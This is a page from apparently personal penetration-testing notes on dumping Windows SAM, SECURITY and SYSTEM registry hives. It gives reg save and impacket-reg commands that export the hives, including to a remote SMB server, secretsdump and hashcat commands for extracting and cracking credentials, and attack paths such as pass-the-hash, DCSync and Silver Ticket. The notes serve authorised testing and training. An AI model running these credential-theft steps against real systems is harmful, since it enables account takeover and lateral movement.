Skip to content

My Hacking Notes

SAM/SECURITY/SYSTEM

My Hacking Notes

Home
OSINT
Network Scanning
Ports / Services
Port Forwarding and Tunnelling
Password Cracking
Password Cracking
- Hashcat
- Wordlists
Windows
Windows
- Workstations
  Workstations
  - Privilege Escalation
- Active Directory
  Active Directory
  - Methodology
  - Remote Execution Tools
  - PowerShell Commands
  - CMD Commands
  - Relay & Coercion
    Relay & Coercion
    
    Relay (ntlmrelayx)
    
    RPC Coercion
    
    Responder
    
    mitm6
    
    Insecure Name Resolution Protocols
    
    WPAD
    
    Exchange Coercion (PrivExchange)
  - Discovery & Audit
    Discovery & Audit
    
    SMB & RPC Enumeration
    
    SMB Shares & Data Hunting
    
    LDAP Checks
    
    BloodHound
    
    User Enumeration
    
    Password Spraying
  - Privilege Escalation
    Privilege Escalation
    
    ADCS Discovery
    
    ADCS - ESC 1
    
    ADCS - ESC 8
    
    Shadow Credentials
    
    BadSuccessor (dMSA Abuse)
    
    ZeroLogon
  - Credential Access
    Credential Access
    
    SAM/SECURITY/SYSTEM SAM/SECURITY/SYSTEM
    Table of contents
    
    Hive File Retrieval
    
    Local Access
    
    SMB Access
    
    Attack Paths
    
    SAM + SYSTEM Dump
    
    Impersonate Other Users (Local Accounts)
    
    SECURITY + SYSTEM Dump
    
    Impersonate DC or Privileged Host via MACHINE.ACC$
    
    DCSync
    
    DPAPI
    
    AutoLogon
    
    GPP/SYSVOL Credential Leaks
  - Delegation
    Delegation
    
    Discovery
    
    Resource Based Constrained Delegation (RBCD)
    
    Unconstrained Delegation (KUD)
    
    Constrained Delegation (KCD)
  - Kerberos
    Kerberos
    
    Authentication Process
    
    S4U2self and S4U2Proxy
    
    Password / Hash -> TGT
    
    AS-REP Roast
    
    Kerberoast
    
    Ticket Forgery
    Ticket Forgery
    
    Golden Ticket
    
    Silver Ticket
- File Transfer
  File Transfer
  - Download to Windows
  - Upload from Windows
Microsoft Entra ID (Azure AD)
Microsoft Entra ID (Azure AD)
- Discovery & Recon
  Discovery & Recon
  - Federated vs Managed
  - Username Enumeration
- Password Spraying
  Password Spraying
  - Tools
WiFi
WiFi
CTF Walkthroughs
CTF Walkthroughs
- Proving Grounds
  Proving Grounds
  - Cassios
  - Cobweb
  - Muddy
  - Forward

SAM / SYSTEM / SECURITY¶

SAM: Local Security Account Manager hive. Holds local users/groups and NT/LM password hashes.
SECURITY: LSA policy hive. Holds LSA Secrets, NL$KM and MSCachev2 entries.
SYSTEM: System hive which holds the LSA BootKey (SysKey) used to decrypt data in SAM and SECURITY. Low value on its own.
Dump secrets: impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL

Hive File Retrieval¶

Local Access¶

reg save HKLM\SECURITY C:\temp\SECURITY
reg save HKLM\SYSTEM C:\temp\SYSTEM
reg save HKLM\SOFTWARE C:\temp\SOFTWARE

SMB Access¶

impacket-reg domain/username@ip -no-pass save -keyName 'HKLM\SECURITY' -o '\\<smb_server_ip>\C$
impacket-reg domain/username@ip -no-pass save -keyName 'HKLM\SAM' -o '\\<smb_server_ip>\C$
impacket-reg domain/username@ip -no-pass save -keyName 'HKLM\SYSTEM' -o '\\<smb_server_ip>\C$

Attack Paths¶

SAM + SYSTEM Dump¶

Impersonate Other Users (Local Accounts)¶

Steal other user's password hashes, pass-the-hash to authenticate as them.
Check for password reuse and pass them across the domain.
Pass-the-Hash using remote execution tools

SECURITY + SYSTEM Dump¶

Service/Task creds (plain or reversible)
AutoLogon (DefaultPassword)
$MACHINE.ACC (computer account NT hash)
Decrypt DPAPI Secrets using DPAPI_SYSTEM
Encrypted MSCachev2 Domain Creds
- Crack with: hashcat -m 2100 mscachev2.hashes <wordlist>

Impersonate DC or Privileged Host via MACHINE.ACC$¶

DCSync - Typically DC$ only
Silver Ticket